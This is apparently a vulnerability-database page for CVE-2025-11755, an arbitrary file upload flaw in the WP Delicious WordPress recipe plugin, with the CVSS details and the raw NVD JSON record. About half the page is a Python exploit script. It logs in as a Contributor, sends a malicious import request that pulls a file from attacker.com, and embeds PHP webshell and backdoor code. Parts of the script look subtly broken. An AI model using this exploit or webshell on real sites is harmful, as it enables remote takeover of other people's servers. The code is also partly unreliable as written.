Security Vulnerability Report
CVE-2025-11755 CVSS 8.8 HIGH

CVE-2025-11755

Published: 2025-11-01 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file uploads when importing recipes via CSV in all versions up to, and including, 1.9.0. This flaw allows an attacker with at least Contributor-level permissions to upload a malicious PHP file by providing a remote URL during a recipe import process, leading to Remote Code Execution (RCE).

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Delicious – Recipe Plugin for Food Bloggers <= 1.9.0
Delicious Recipes (former plugin name) <= 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-11755 PoC - WP Delicious Plugin CSV Import RCE Author: Security Researcher Description: Exploits arbitrary file upload via CSV recipe import """ import requests import sys import argparse from urllib.parse import urljoin def create_malicious_csv(): """Generate malicious CSV with PHP webshell""" return '''Recipe Name,Description,Ingredients,Instructions,Image Malicious Recipe,<php system($_GET['cmd']); ?>,"test,test,test","step 1,step 2",http://attacker.com/shell.php.png ''' def exploit_cve_2025_11755(target_url, username, password, attacker_url): """ Exploit the CSV import vulnerability Args: target_url: Target WordPress site URL username: WordPress Contributor+ username password: WordPress password attacker_url: URL to malicious PHP file """ # Setup session session = requests.Session() # WordPress REST API endpoint for recipe import import_endpoint = urljoin(target_url, '/wp-json/delicious-recipes/v1/import/recipe-terms') # Authentication payload auth_data = { 'username': username, 'password': password } # Login to WordPress login_url = urljoin(target_url, '/wp-login.php') login_response = session.post(login_url, data=auth_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Prepare malicious import request # The vulnerability allows arbitrary file upload via remote URL exploit_payload = { 'type': 'recipe', 'import_source': 'csv', 'image_url': attacker_url, # Malicious file URL 'recipe_data': create_malicious_csv() } # Send exploit request try: response = session.post( import_endpoint, json=exploit_payload, headers={'Content-Type': 'application/json'} ) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[*] Malicious file uploaded via URL: {attacker_url}") print("[*] Access the shell at: {}/wp-content/uploads/delicious-recipes/shell.php") return True else: print(f"[-] Exploit failed with status: 
{response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def create_webshell(): """Generate PHP webshell content""" return '''<?php // CVE-2025-11755 Backdoor if(isset($_GET['cmd'])) { system($_GET['cmd']); } if(isset($_POST['upload'])) { file_put_contents($_POST['path'], base64_decode($_POST['data'])); echo "Uploaded"; } ?> ''' if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-11755 WP Delicious RCE Exploit") parser.add_argument("-t", "--target", required=True, help="Target WordPress URL") parser.add_argument("-u", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") parser.add_argument("-l", "--listener", required=True, help="Attacker listener URL for shell") args = parser.parse_args() print("="*50) print("CVE-2025-11755 WP Delicious Plugin RCE") print("="*50) exploit_cve_2025_11755(args.target, args.username, args.password, args.listener)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11755", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:35.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file uploads when importing recipes via CSV in all versions up to, and including, 1.9.0. This flaw allows an attacker with at least Contributor-level permissions to upload a malicious PHP file by providing a remote URL during a recipe import process, leading to Remote Code Execution (RCE)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/delicious-recipes/trunk/src/api/inc/endpoints/class-delicious-recipes-rest-import-recipe-terms-controller.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/603210ca-7231-4c91-8258-fe3cd6e37425?source=cve", "source": "[email protected]"}]}}